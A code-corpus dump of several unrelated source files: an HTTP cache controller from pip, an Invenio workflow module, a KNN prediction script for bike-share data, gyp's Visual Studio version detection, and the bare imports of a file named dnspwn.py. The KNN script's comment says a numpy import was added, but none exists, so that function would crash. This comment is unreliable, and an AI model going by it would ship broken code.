compiteing/flask-ponypermission | venv/lib/python2.7/site-packages/pip/_vendor/cachecontrol/controller.py | 317 | 10124 | """
The httplib2 algorithms ported for use with requests.
"""
import re
import calendar
import time
from email.utils import parsedate_tz
from pip._vendor.requests.structures import CaseInsensitiveDict
from .cache import DictCache
from .serialize import Serializer
# Regex from Appendix B of RFC 3986: splits a URI reference into
# scheme / authority / path / query / fragment capture groups.
URI = re.compile(r"^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?")


def parse_uri(uri):
    """Parses a URI using the regex given in Appendix B of RFC 3986.

        (scheme, authority, path, query, fragment) = parse_uri(uri)

    Absent components come back as ``None`` (except the path, which the
    pattern always matches, possibly as an empty string).
    """
    match = URI.match(uri)
    # Groups 1/3/6/8 hold the delimiters (':', '//', '?', '#'); the bare
    # component values live in groups 2, 4, 5, 7 and 9 respectively.
    return (match.group(2), match.group(4), match.group(5),
            match.group(7), match.group(9))
class CacheController(object):
    """An interface to see if request should cached or not.

    Implements the httplib2-derived HTTP caching algorithm on top of a
    pluggable cache store and response serializer.
    """
    def __init__(self, cache=None, cache_etags=True, serializer=None):
        # cache: mapping-like store; defaults to an in-memory DictCache.
        # cache_etags: when True, responses carrying an ETag are cached even
        #     if they are not otherwise fresh-cacheable.
        # serializer: converts responses to/from the stored byte format.
        self.cache = cache or DictCache()
        self.cache_etags = cache_etags
        self.serializer = serializer or Serializer()

    @classmethod
    def _urlnorm(cls, uri):
        """Normalize the URL to create a safe key for the cache"""
        (scheme, authority, path, query, fragment) = parse_uri(uri)
        if not scheme or not authority:
            raise Exception("Only absolute URIs are allowed. uri = %s" % uri)
        scheme = scheme.lower()
        authority = authority.lower()

        if not path:
            path = "/"

        # Could do syntax based normalization of the URI before
        # computing the digest. See Section 6.2.2 of Std 66.
        request_uri = query and "?".join([path, query]) or path
        defrag_uri = scheme + "://" + authority + request_uri

        return defrag_uri

    @classmethod
    def cache_url(cls, uri):
        # Public alias: the cache key for a URI is its normalized form
        # (fragment dropped, scheme/authority lowercased).
        return cls._urlnorm(uri)

    def parse_cache_control(self, headers):
        """
        Parse the cache control headers returning a dictionary with values
        for the different directives.
        """
        retval = {}

        cc_header = 'cache-control'
        if 'Cache-Control' in headers:
            cc_header = 'Cache-Control'

        if cc_header in headers:
            parts = headers[cc_header].split(',')
            # Directives with an argument become (name, value) string pairs;
            # bare directives are recorded with a placeholder value of 1.
            parts_with_args = [
                tuple([x.strip().lower() for x in part.split("=", 1)])
                for part in parts if -1 != part.find("=")
            ]
            parts_wo_args = [
                (name.strip().lower(), 1)
                for name in parts if -1 == name.find("=")
            ]
            retval = dict(parts_with_args + parts_wo_args)

        return retval

    def cached_request(self, request):
        """
        Return a cached response if it exists in the cache, otherwise
        return False.
        """
        cache_url = self.cache_url(request.url)
        cc = self.parse_cache_control(request.headers)

        # non-caching states
        no_cache = True if 'no-cache' in cc else False
        if 'max-age' in cc and cc['max-age'] == 0:
            no_cache = True

        # Bail out if no-cache was set
        if no_cache:
            return False

        # It is in the cache, so lets see if it is going to be
        # fresh enough
        resp = self.serializer.loads(request, self.cache.get(cache_url))

        # Check to see if we have a cached object
        if not resp:
            return False

        # If we have a cached 301, return it immediately. We don't
        # need to test our response for other headers b/c it is
        # intrinsically "cacheable" as it is Permanent.
        # See:
        #   https://tools.ietf.org/html/rfc7231#section-6.4.2
        #
        # Client can try to refresh the value by repeating the request
        # with cache busting headers as usual (ie no-cache).
        if resp.status == 301:
            return resp

        headers = CaseInsensitiveDict(resp.headers)
        if not headers or 'date' not in headers:
            # With date or etag, the cached response can never be used
            # and should be deleted.
            if 'etag' not in headers:
                self.cache.delete(cache_url)
            return False

        now = time.time()
        date = calendar.timegm(
            parsedate_tz(headers['date'])
        )
        current_age = max(0, now - date)

        # TODO: There is an assumption that the result will be a
        #       urllib3 response object. This may not be best since we
        #       could probably avoid instantiating or constructing the
        #       response until we know we need it.
        resp_cc = self.parse_cache_control(headers)

        # determine freshness
        freshness_lifetime = 0

        # Check the max-age pragma in the cache control header
        if 'max-age' in resp_cc and resp_cc['max-age'].isdigit():
            freshness_lifetime = int(resp_cc['max-age'])

        # If there isn't a max-age, check for an expires header
        elif 'expires' in headers:
            expires = parsedate_tz(headers['expires'])
            if expires is not None:
                expire_time = calendar.timegm(expires) - date
                freshness_lifetime = max(0, expire_time)

        # determine if we are setting freshness limit in the req
        # (request max-age overrides the response's own lifetime)
        if 'max-age' in cc:
            try:
                freshness_lifetime = int(cc['max-age'])
            except ValueError:
                freshness_lifetime = 0

        if 'min-fresh' in cc:
            try:
                min_fresh = int(cc['min-fresh'])
            except ValueError:
                min_fresh = 0
            # adjust our current age by our min fresh
            current_age += min_fresh

        # see how fresh we actually are
        fresh = (freshness_lifetime > current_age)

        if fresh:
            return resp

        # we're not fresh. If we don't have an Etag, clear it out
        if 'etag' not in headers:
            self.cache.delete(cache_url)

        # return the original handler
        return False

    def conditional_headers(self, request):
        # Build the If-None-Match / If-Modified-Since headers needed to
        # revalidate a stale cached response with the origin server.
        cache_url = self.cache_url(request.url)
        resp = self.serializer.loads(request, self.cache.get(cache_url))
        new_headers = {}

        if resp:
            headers = CaseInsensitiveDict(resp.headers)

            if 'etag' in headers:
                new_headers['If-None-Match'] = headers['ETag']

            if 'last-modified' in headers:
                new_headers['If-Modified-Since'] = headers['Last-Modified']

        return new_headers

    def cache_response(self, request, response, body=None):
        """
        Algorithm for caching requests.

        This assumes a requests Response object.
        """
        # From httplib2: Don't cache 206's since we aren't going to
        # handle byte range requests
        if response.status not in [200, 203, 300, 301]:
            return

        response_headers = CaseInsensitiveDict(response.headers)

        cc_req = self.parse_cache_control(request.headers)
        cc = self.parse_cache_control(response_headers)

        cache_url = self.cache_url(request.url)

        # Delete it from the cache if we happen to have it stored there
        no_store = cc.get('no-store') or cc_req.get('no-store')
        if no_store and self.cache.get(cache_url):
            self.cache.delete(cache_url)

        # If we've been given an etag, then keep the response
        if self.cache_etags and 'etag' in response_headers:
            self.cache.set(
                cache_url,
                self.serializer.dumps(request, response, body=body),
            )

        # Add to the cache any 301s. We do this before looking that
        # the Date headers.
        elif response.status == 301:
            self.cache.set(
                cache_url,
                self.serializer.dumps(request, response)
            )

        # Add to the cache if the response headers demand it. If there
        # is no date header then we can't do anything about expiring
        # the cache.
        elif 'date' in response_headers:
            # cache when there is a max-age > 0
            if cc and cc.get('max-age'):
                if int(cc['max-age']) > 0:
                    self.cache.set(
                        cache_url,
                        self.serializer.dumps(request, response, body=body),
                    )

            # If the request can expire, it means we should cache it
            # in the meantime.
            elif 'expires' in response_headers:
                if response_headers['expires']:
                    self.cache.set(
                        cache_url,
                        self.serializer.dumps(request, response, body=body),
                    )

    def update_cached_response(self, request, response):
        """On a 304 we will get a new set of headers that we want to
        update our cached value with, assuming we have one.

        This should only ever be called when we've sent an ETag and
        gotten a 304 as the response.
        """
        cache_url = self.cache_url(request.url)

        cached_response = self.serializer.loads(
            request,
            self.cache.get(cache_url)
        )

        if not cached_response:
            # we didn't have a cached response
            return response

        # Lets update our headers with the headers from the new request:
        # http://tools.ietf.org/html/draft-ietf-httpbis-p4-conditional-26#section-4.1
        #
        # The server isn't supposed to send headers that would make
        # the cached body invalid. But... just in case, we'll be sure
        # to strip out ones we know that might be problmatic due to
        # typical assumptions.
        excluded_headers = [
            "content-length",
        ]

        cached_response.headers.update(
            dict((k, v) for k, v in response.headers.items()
                 if k.lower() not in excluded_headers)
        )

        # we want a 200 b/c we have content via the cache
        cached_response.status = 200

        # update our cache
        self.cache.set(
            cache_url,
            self.serializer.dumps(request, cached_response),
        )

        return cached_response
| mit |
Theer108/invenio | invenio/modules/workflows/definitions.py | 13 | 5875 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Contains basic workflow types for use in workflow definitions."""
import collections
from six import string_types
class WorkflowMissing(object):
    """Placeholder workflow definition.

    Its single task is a no-op, so objects processed with it pass
    through unchanged.
    """
    # One task taking (obj, eng) and doing nothing.
    workflow = [lambda obj, eng: None]
class WorkflowBase(object):
    """Base class for workflow definition.

    Interface to define which functions should be imperatively implemented.
    All workflows should inherit from this class.
    """

    @staticmethod
    def get_title(bwo, **kwargs):
        """Return the value to put in the title column of HoldingPen."""
        return "No title"

    @staticmethod
    def get_description(bwo, **kwargs):
        """Return the value to put in the description column of HoldingPen."""
        return "No description"

    @staticmethod
    def formatter(obj, **kwargs):
        """Format the object."""
        return "No data"
class RecordWorkflow(WorkflowBase):
    """Workflow to be used where BibWorkflowObject is a Record instance."""

    workflow = []

    @staticmethod
    def get_title(bwo):
        """Return the record title(s) joined with commas, or a fallback."""
        field_map = {"title": "title"}
        record = bwo.get_data()
        extracted_titles = []
        if hasattr(record, "get") and "title" in record:
            # A bare string is the title itself; otherwise assume a
            # mapping holding the title under the mapped key.
            if isinstance(record["title"], str):
                extracted_titles = [record["title"]]
            else:
                extracted_titles.append(record["title"][field_map["title"]])
        return ", ".join(extracted_titles) or "No title found"

    @staticmethod
    def get_description(bwo):
        """Get the description (identifiers and categories) from the object data."""
        from invenio.modules.records.api import Record
        from flask import render_template, current_app
        record = bwo.get_data()
        # BUGFIX: this was initialised as a dict, so the .extend() below
        # always raised AttributeError and the fallback ran unconditionally.
        final_identifiers = []
        try:
            identifiers = Record(record.dumps()).persistent_identifiers
            for values in identifiers.values():
                final_identifiers.extend([i.get("value") for i in values])
        except Exception:
            current_app.logger.exception("Could not get identifiers")
            # Fallback: use the system control number if present.
            # NOTE(review): placed inside the except block so a successful
            # extraction above is not overwritten -- confirm intent.
            if hasattr(record, "get"):
                final_identifiers = [
                    record.get("system_control_number", {}).get("value", 'No ids')
                ]
            else:
                final_identifiers = []
        categories = []
        if hasattr(record, "get"):
            # The subject terms may live under either of two field names.
            if 'subject' in record:
                lookup = ["subject", "term"]
            elif "subject_term" in record:
                lookup = ["subject_term", "term"]
            else:
                lookup = None
            if lookup:
                primary, secondary = lookup
                category_list = record.get(primary, [])
                if isinstance(category_list, dict):
                    category_list = [category_list]
                categories = [subject[secondary] for subject in category_list]
        return render_template('workflows/styles/harvesting_record.html',
                               categories=categories,
                               identifiers=final_identifiers)

    @staticmethod
    def formatter(bwo, **kwargs):
        """Nicely format the record.

        Accepts an optional ``formatter`` callable or an output format
        ``of`` keyword; falls back to pretty-printed XML or pformat.
        """
        from pprint import pformat
        from invenio.modules.records.api import Record
        data = bwo.get_data()
        if not data:
            return ''
        formatter = kwargs.get("formatter", None)
        of = kwargs.get("of", None)
        if formatter:
            # A separate formatter is supplied
            return formatter(data)
        # BUGFIX: bind the name up front; previously a non-string payload
        # (or a swallowed XML-parse failure) reached `if not formatted_data`
        # with the variable undefined, raising NameError.
        formatted_data = None
        if isinstance(data, collections.Mapping):
            # Dicts are cool on its own, but maybe its SmartJson (record)
            try:
                data = Record(data.dumps()).legacy_export_as_marc()
            except (TypeError, KeyError):
                pass
        if isinstance(data, string_types):
            # We can try formatter!
            # If already XML, format_record does not like it.
            if of and of != 'xm':
                try:
                    from invenio.modules.formatter import format_record
                    formatted_data = format_record(
                        recID=None,
                        of=of,
                        xml_record=data
                    )
                except TypeError:
                    # Wrong kind of type
                    pass
            else:
                # So, XML then
                from xml.dom.minidom import parseString
                try:
                    unpretty_data = parseString(data)
                    formatted_data = unpretty_data.toprettyxml()
                except TypeError:
                    # Probably not proper XML string then
                    return "Data cannot be parsed: %s" % (data,)
                except Exception:
                    # Just return raw string
                    pass
        if not formatted_data:
            formatted_data = data
        if isinstance(formatted_data, dict):
            formatted_data = pformat(formatted_data)
        return formatted_data
| gpl-2.0 |
noelevans/sandpit | kaggle/washington_bike_share/knn_normalising.py | 1 | 3166 | import datetime
import logging
import math
import random
import pandas as pd
logging.basicConfig(level=logging.INFO)
# Feature columns used for the KNN distance; the PERIODICS wrap around
# once normalised to [0, 1] (hour of day, day of year, day of week).
INPUT_FIELDS = ('holiday', 'workingday', 'temp', 'atemp', 'humidity',
                'windspeed', 'hour', 'day_of_year', 'day_of_week')
PERIODICS = ('hour', 'day_of_year', 'day_of_week')
# Target column predicted by the model.
RESULT_FIELD = 'count'
def normalise(df, normalise=()):
    """Scale each named column of *df* in place to the range [0, 1].

    ``normalise`` is the sequence of column names to rescale (the default
    was a mutable list; an immutable tuple is safer).  Returns *df*.

    NOTE(review): a constant column (max == min) divides by zero, same as
    the original -- confirm inputs always vary.
    """
    for field in normalise:
        lo = min(df[field])
        hi = max(df[field])
        span = hi - lo
        # List comprehension instead of map() so the assigned value is a
        # concrete list under both Python 2 and 3.
        df[field] = [float(v - lo) / span for v in df[field]]
    return df
def load_and_munge_training_data(filename):
    # Load the CSV, derive hour / day-of-year / day-of-week features from
    # the 'datetime' column ("YYYY-MM-DD hh:mm:ss"), then normalise every
    # INPUT_FIELD to [0, 1].
    # NOTE(review): relies on Python 2 map() returning a list; under
    # Python 3 these assignments would store iterators -- confirm runtime.
    parse_hour = lambda dt: int(dt.split()[1].split(':')[0])
    parse_day_of_week = lambda dt: parse_date(dt).weekday()
    def parse_date(dt):
        # "YYYY-MM-DD ..." -> datetime.date
        return datetime.date(*(int(x) for x in dt.split()[0].split('-')))
    def parse_day_of_year(dt):
        # Days elapsed since January 1st of the same year (Jan 1 -> 0).
        _date = parse_date(dt)
        year_start = datetime.date(_date.year, 1, 1)
        return (_date - year_start).days
    df = pd.read_csv(open(filename))
    df['hour'] = map(parse_hour, df['datetime'])
    df['day_of_year'] = map(parse_day_of_year, df['datetime'])
    df['day_of_week'] = map(parse_day_of_week, df['datetime'])
    return normalise(df, INPUT_FIELDS)
def euclidean_dist(a, b):
    """Euclidean distance between two rows over INPUT_FIELDS.

    Periodic features (already normalised to [0, 1]) are compared along
    the shorter arc of the unit circle.
    """
    def diff(m, n, field):
        d = m - n
        if field in PERIODICS:
            # BUGFIX: the previous `(m - n) % 1` mapped e.g. -0.1 to 0.9,
            # overstating the separation; the true periodic distance is the
            # shorter way around: min(|d| mod 1, 1 - |d| mod 1).
            d = abs(d) % 1.0
            d = min(d, 1.0 - d)
        return d
    return math.sqrt(sum(diff(a[f], b[f], f) ** 2 for f in INPUT_FIELDS))
def shuffle(df):
    """Return *df* with its rows in uniformly random order."""
    n = len(df)
    order = random.sample(range(n), n)
    # .iloc replaces DataFrame.irow(), which was deprecated and removed
    # from pandas long ago.
    return df.iloc[order]
def most_influential(training, fields):
    # Return the field whose grouping yields the lowest summed per-group
    # standard deviation of the target column (i.e. the most homogeneous
    # split of RESULT_FIELD).
    # NOTE: `np` requires `import numpy as np` at module level (added to
    # the import block at the top of the file).
    def homogeneity(field):
        return training.groupby(field)[RESULT_FIELD].apply(np.std).sum()
    return sorted((homogeneity(f), f) for f in fields)[0][1]
def knn(vector, neighbours, k=3):
    """Return the k training rows nearest *vector* as (distance, row) pairs."""
    scored = [(euclidean_dist(vector, row), row)
              for _, row in neighbours.iterrows()]
    scored.sort(key=lambda pair: pair[0])
    return scored[:k]
def gaussian_weight(dist, sigma=12.0):
    """Unnormalised Gaussian kernel weight for a distance (1.0 at dist=0)."""
    exponent = -(dist ** 2) / (2.0 * sigma ** 2)
    return math.exp(exponent)
def estimate(test, training):
    """Predict the target for row *test*.

    The prediction is the Gaussian-weighted mean of the nearest
    neighbours' RESULT_FIELD values, truncated to an int.
    """
    weighted = []
    for dist, neighbour in knn(test, training):
        weighted.append((gaussian_weight(dist), neighbour))
    total_weight = sum(weight for weight, _ in weighted)
    weighted_sum = sum(weight * neighbour[RESULT_FIELD]
                       for weight, neighbour in weighted)
    return int(weighted_sum / total_weight)
def main():
    """Train on train.csv, predict for the test rows, and write a CSV.

    With dry_run=True, 40% of the (shuffled) training data is held out as
    an evaluation set instead of reading test.csv.
    """
    dry_run = False
    all_train = load_and_munge_training_data('train.csv')
    if dry_run:
        train_on = 0.6
        all_train = shuffle(all_train)
        split = int(train_on * len(all_train))
        train = all_train[:split]
        # Bug fixed: the original sliced the hold-out from split + 1,
        # silently dropping the row at index `split` from both sets.
        test = all_train[split:]
    else:
        train = all_train
        test = load_and_munge_training_data('test.csv')

    filename = 'knn-normalising.csv'
    with open(filename, 'w') as f:
        f.write('datetime,count\n')
        for n, t in test.iterrows():
            # Compute each prediction once; the original ran the full KNN
            # search twice per row (once for the file, once for stdout).
            line = '%s,%i' % (t['datetime'], estimate(t, train))
            f.write(line + '\n')
            print(line)
if __name__ == '__main__':
    # Script entry point: train, predict and write knn-normalising.csv.
    main()
| mit |
gyyu/cmu-debate | node_modules/node-gyp/gyp/pylib/gyp/MSVSVersion.py | 1509 | 17165 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Handle version information related to Visual Stuio."""
import errno
import os
import re
import subprocess
import sys
import gyp
import glob
class VisualStudioVersion(object):
  """Information regarding a version of Visual Studio."""

  def __init__(self, short_name, description,
               solution_version, project_version, flat_sln, uses_vcxproj,
               path, sdk_based, default_toolset=None):
    self.short_name = short_name              # e.g. '2010' or '2010e'
    self.description = description            # human-readable product name
    self.solution_version = solution_version  # version stamp for .sln files
    self.project_version = project_version    # version stamp for project files
    self.flat_sln = flat_sln                  # True for Express editions
    self.uses_vcxproj = uses_vcxproj          # .vcxproj (VS2010+) vs .vcproj
    self.path = path                          # install root, or None
    self.sdk_based = sdk_based                # True when only the SDK exists
    self.default_toolset = default_toolset    # msbuild toolset, e.g. 'v120'

  def ShortName(self):
    """Get the short name of the version, e.g. '2010e'."""
    return self.short_name

  def Description(self):
    """Get the full description of the version."""
    return self.description

  def SolutionVersion(self):
    """Get the version number of the sln files."""
    return self.solution_version

  def ProjectVersion(self):
    """Get the version number of the vcproj or vcxproj files."""
    return self.project_version

  def FlatSolution(self):
    """Whether projects must be laid out flat in the solution (Express)."""
    return self.flat_sln

  def UsesVcxproj(self):
    """Returns true if this version uses a vcxproj file."""
    return self.uses_vcxproj

  def ProjectExtension(self):
    """Returns the file extension for the project."""
    return self.uses_vcxproj and '.vcxproj' or '.vcproj'

  def Path(self):
    """Returns the path to Visual Studio installation."""
    return self.path

  def ToolPath(self, tool):
    """Returns the path to a given compiler tool. """
    return os.path.normpath(os.path.join(self.path, "VC/bin", tool))

  def DefaultToolset(self):
    """Returns the msbuild toolset version that will be used in the absence
    of a user override."""
    return self.default_toolset

  def SetupScript(self, target_arch):
    """Returns a command (with arguments) to be used to set up the
    environment."""
    # Check if we are running in the SDK command line environment and use
    # the setup script from the SDK if so. |target_arch| should be either
    # 'x86' or 'x64'.
    assert target_arch in ('x86', 'x64')
    sdk_dir = os.environ.get('WindowsSDKDir')
    if self.sdk_based and sdk_dir:
      return [os.path.normpath(os.path.join(sdk_dir, 'Bin/SetEnv.Cmd')),
              '/' + target_arch]
    else:
      # We don't use VC/vcvarsall.bat for x86 because vcvarsall calls
      # vcvars32, which it can only find if VS??COMNTOOLS is set, which it
      # isn't always.
      if target_arch == 'x86':
        # String comparison works here because all short names are
        # 4-digit years (optionally suffixed with 'e').
        if self.short_name >= '2013' and self.short_name[-1] != 'e' and (
            os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
            os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
          # VS2013 and later, non-Express have a x64-x86 cross that we want
          # to prefer.
          return [os.path.normpath(
             os.path.join(self.path, 'VC/vcvarsall.bat')), 'amd64_x86']
        # Otherwise, the standard x86 compiler.
        return [os.path.normpath(
          os.path.join(self.path, 'Common7/Tools/vsvars32.bat'))]
      else:
        assert target_arch == 'x64'
        arg = 'x86_amd64'
        # Use the 64-on-64 compiler if we're not using an express
        # edition and we're running on a 64bit OS.
        if self.short_name[-1] != 'e' and (
            os.environ.get('PROCESSOR_ARCHITECTURE') == 'AMD64' or
            os.environ.get('PROCESSOR_ARCHITEW6432') == 'AMD64'):
          arg = 'amd64'
        return [os.path.normpath(
            os.path.join(self.path, 'VC/vcvarsall.bat')), arg]
def _RegistryQueryBase(sysdir, key, value):
  """Use reg.exe to read a particular key.

  While ideally we might use the win32 module, we would like gyp to be
  python neutral, so for instance cygwin python lacks this module.

  Arguments:
    sysdir: The system subdirectory to attempt to launch reg.exe from.
    key: The registry key to read from.
    value: The particular value to read.
  Return:
    stdout from reg.exe, or None for failure.
  """
  # Skip if not on Windows or Python Win32 setup issue
  if sys.platform not in ('win32', 'cygwin'):
    return None
  # Setup params to pass to and attempt to launch reg.exe
  cmd = [os.path.join(os.environ.get('WINDIR', ''), sysdir, 'reg.exe'),
         'query', key]
  if value:
    cmd.extend(['/v', value])
  # stderr is captured (and discarded) so error text does not leak to the
  # caller's console; only stdout is consumed below.
  p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  # Obtain the stdout from reg.exe, reading to the end so p.returncode is valid
  # Note that the error text may be in [1] in some cases
  text = p.communicate()[0]
  # Check return code from reg.exe; officially 0==success and 1==error
  if p.returncode:
    return None
  return text
def _RegistryQuery(key, value=None):
  r"""Use reg.exe to read a particular key through _RegistryQueryBase.

  First tries to launch from %WinDir%\Sysnative to avoid WoW64 redirection. If
  that fails, it falls back to System32. Sysnative is available on Vista and
  up and available on Windows Server 2003 and XP through KB patch 942589. Note
  that Sysnative will always fail if using 64-bit python due to it being a
  virtual directory and System32 will work correctly in the first place.
  KB 942589 - http://support.microsoft.com/kb/942589/en-us.

  Arguments:
    key: The registry key.
    value: The particular registry value to read (optional).
  Return:
    stdout from reg.exe, or None for failure.
  """
  text = None
  try:
    text = _RegistryQueryBase('Sysnative', key, value)
  # NOTE(review): Python 2-only except syntax; under Python 3 this would
  # need to read "except OSError as e".
  except OSError, e:
    if e.errno == errno.ENOENT:
      # Sysnative does not exist on this system; retry through System32.
      text = _RegistryQueryBase('System32', key, value)
    else:
      raise
  return text
def _RegistryGetValueUsingWinReg(key, value):
  """Use the _winreg module to obtain the value of a registry key.

  Args:
    key: The registry key, e.g. r'HKLM\Software\Microsoft\VisualStudio\10.0'.
    value: The particular registry value to read.
  Return:
    contents of the registry key's value, or None on failure.  Throws
    ImportError if _winreg is unavailable.
  """
  # Imported lazily so non-Windows platforms can import this module.
  import _winreg
  try:
    root, subkey = key.split('\\', 1)
    assert root == 'HKLM'  # Only need HKLM for now.
    with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, subkey) as hkey:
      # QueryValueEx returns (data, type); only the data is wanted.
      return _winreg.QueryValueEx(hkey, value)[0]
  except WindowsError:
    return None
def _RegistryGetValue(key, value):
  """Use _winreg or reg.exe to obtain the value of a registry key.

  Using _winreg is preferable because it solves an issue on some corporate
  environments where access to reg.exe is locked down. However, we still need
  to fallback to reg.exe for the case where the _winreg module is not available
  (for example in cygwin python).

  Args:
    key: The registry key.
    value: The particular registry value to read.
  Return:
    contents of the registry key's value, or None on failure.
  """
  try:
    return _RegistryGetValueUsingWinReg(key, value)
  except ImportError:
    pass

  # _winreg is unavailable (e.g. cygwin python); shell out to reg.exe and
  # scrape the value out of its textual output.
  text = _RegistryQuery(key, value)
  if text:
    match = re.search(r'REG_\w+\s+([^\r]+)\r\n', text)
    if match:
      return match.group(1)
  return None
def _CreateVersion(name, path, sdk_based=False):
  """Sets up MSVS project generation.

  Setup is based off the GYP_MSVS_VERSION environment variable or whatever is
  autodetected if GYP_MSVS_VERSION is not explicitly specified. If a version
  is passed in that doesn't match a known value, a KeyError is raised (same
  as the original lookup-table behaviour).
  """
  if path:
    path = os.path.normpath(path)
  # name -> (description, solution_version, project_version, flat_sln,
  #          uses_vcxproj, default_toolset).  The 'e' suffix denotes the
  # Express edition, which requires a flat solution layout.
  specs = {
      '2015': ('Visual Studio 2015', '12.00', '14.0', False, True, 'v140'),
      '2013': ('Visual Studio 2013', '13.00', '12.0', False, True, 'v120'),
      '2013e': ('Visual Studio 2013', '13.00', '12.0', True, True, 'v120'),
      '2012': ('Visual Studio 2012', '12.00', '4.0', False, True, 'v110'),
      '2012e': ('Visual Studio 2012', '12.00', '4.0', True, True, 'v110'),
      '2010': ('Visual Studio 2010', '11.00', '4.0', False, True, None),
      '2010e': ('Visual C++ Express 2010', '11.00', '4.0', True, True, None),
      '2008': ('Visual Studio 2008', '10.00', '9.00', False, False, None),
      '2008e': ('Visual Studio 2008', '10.00', '9.00', True, False, None),
      '2005': ('Visual Studio 2005', '9.00', '8.00', False, False, None),
      '2005e': ('Visual Studio 2005', '9.00', '8.00', True, False, None),
  }
  short_name = str(name)
  description, solution, project, flat_sln, uses_vcxproj, toolset = (
      specs[short_name])
  return VisualStudioVersion(short_name,
                             description,
                             solution_version=solution,
                             project_version=project,
                             flat_sln=flat_sln,
                             uses_vcxproj=uses_vcxproj,
                             path=path,
                             sdk_based=sdk_based,
                             default_toolset=toolset)
def _ConvertToCygpath(path):
"""Convert to cygwin path if we are using cygwin."""
if sys.platform == 'cygwin':
p = subprocess.Popen(['cygpath', path], stdout=subprocess.PIPE)
path = p.communicate()[0].strip()
return path
def _DetectVisualStudioVersions(versions_to_check, force_express):
  """Collect the list of installed visual studio versions.

  Arguments:
    versions_to_check: Registry version numbers (e.g. '10.0') to probe, in
        order of preference.
    force_express: When True, only Express editions are considered even if
        a full devenv.exe is present.
  Returns:
    A list of visual studio versions installed in descending order of
    usage preference.
    Base this on the registry and a quick check if devenv.exe exists.
    Only versions 8-10 are considered.
    Possibilities are:
      2005(e) - Visual Studio 2005 (8)
      2008(e) - Visual Studio 2008 (9)
      2010(e) - Visual Studio 2010 (10)
      2012(e) - Visual Studio 2012 (11)
      2013(e) - Visual Studio 2013 (12)
      2015    - Visual Studio 2015 (14)
    Where (e) is e for express editions of MSVS and blank otherwise.
  """
  version_to_year = {
      '8.0': '2005',
      '9.0': '2008',
      '10.0': '2010',
      '11.0': '2012',
      '12.0': '2013',
      '14.0': '2015',
  }
  versions = []
  for version in versions_to_check:
    # Old method of searching for which VS version is installed
    # We don't use the 2010-encouraged-way because we also want to get the
    # path to the binaries, which it doesn't offer.
    # Both native and Wow6432Node (32-bit view on 64-bit Windows) hives are
    # probed, for both the full product and VC Express.
    keys = [r'HKLM\Software\Microsoft\VisualStudio\%s' % version,
            r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\%s' % version,
            r'HKLM\Software\Microsoft\VCExpress\%s' % version,
            r'HKLM\Software\Wow6432Node\Microsoft\VCExpress\%s' % version]
    for index in range(len(keys)):
      path = _RegistryGetValue(keys[index], 'InstallDir')
      if not path:
        continue
      path = _ConvertToCygpath(path)
      # Check for full.
      full_path = os.path.join(path, 'devenv.exe')
      express_path = os.path.join(path, '*express.exe')
      if not force_express and os.path.exists(full_path):
        # Add this one.
        # InstallDir points at Common7/IDE, so the install root is two
        # levels up.
        versions.append(_CreateVersion(version_to_year[version],
            os.path.join(path, '..', '..')))
      # Check for express.
      elif glob.glob(express_path):
        # Add this one.
        versions.append(_CreateVersion(version_to_year[version] + 'e',
            os.path.join(path, '..', '..')))
    # The old method above does not work when only SDK is installed.
    keys = [r'HKLM\Software\Microsoft\VisualStudio\SxS\VC7',
            r'HKLM\Software\Wow6432Node\Microsoft\VisualStudio\SxS\VC7']
    for index in range(len(keys)):
      path = _RegistryGetValue(keys[index], version)
      if not path:
        continue
      path = _ConvertToCygpath(path)
      if version != '14.0':  # There is no Express edition for 2015.
        versions.append(_CreateVersion(version_to_year[version] + 'e',
            os.path.join(path, '..'), sdk_based=True))
  return versions
def SelectVisualStudioVersion(version='auto', allow_fallback=True):
  """Select which version of Visual Studio projects to generate.

  Arguments:
    version: Hook to allow caller to force a particular version (vs auto).
    allow_fallback: When False, raise instead of falling back to a default
        version if nothing is detected.
  Returns:
    An object representing a visual studio project format version.
  """
  # In auto mode, check environment variable for override.
  if version == 'auto':
    version = os.environ.get('GYP_MSVS_VERSION', 'auto')
  # Maps the requested version to the registry version numbers to probe,
  # in order of preference ('auto' tries newest first, 11.0 last).
  version_map = {
    'auto': ('14.0', '12.0', '10.0', '9.0', '8.0', '11.0'),
    '2005': ('8.0',),
    '2005e': ('8.0',),
    '2008': ('9.0',),
    '2008e': ('9.0',),
    '2010': ('10.0',),
    '2010e': ('10.0',),
    '2012': ('11.0',),
    '2012e': ('11.0',),
    '2013': ('12.0',),
    '2013e': ('12.0',),
    '2015': ('14.0',),
  }
  # An explicit install path bypasses detection entirely, but then the
  # exact version must also be named.
  override_path = os.environ.get('GYP_MSVS_OVERRIDE_PATH')
  if override_path:
    msvs_version = os.environ.get('GYP_MSVS_VERSION')
    if not msvs_version:
      raise ValueError('GYP_MSVS_OVERRIDE_PATH requires GYP_MSVS_VERSION to be '
                       'set to a particular version (e.g. 2010e).')
    return _CreateVersion(msvs_version, override_path, sdk_based=True)
  version = str(version)
  # An 'e' in the requested name forces Express-only detection.
  versions = _DetectVisualStudioVersions(version_map[version], 'e' in version)
  if not versions:
    if not allow_fallback:
      raise ValueError('Could not locate Visual Studio installation.')
    if version == 'auto':
      # Default to 2005 if we couldn't find anything
      return _CreateVersion('2005', None)
    else:
      return _CreateVersion(version, None)
  return versions[0]
| mit |
jordan-wright/python-wireless-attacks | dnspwn.py | 2 | 1605 | from scapy.all import *
import time
import logging
# Module-wide logger; everything is echoed to the console at DEBUG level.
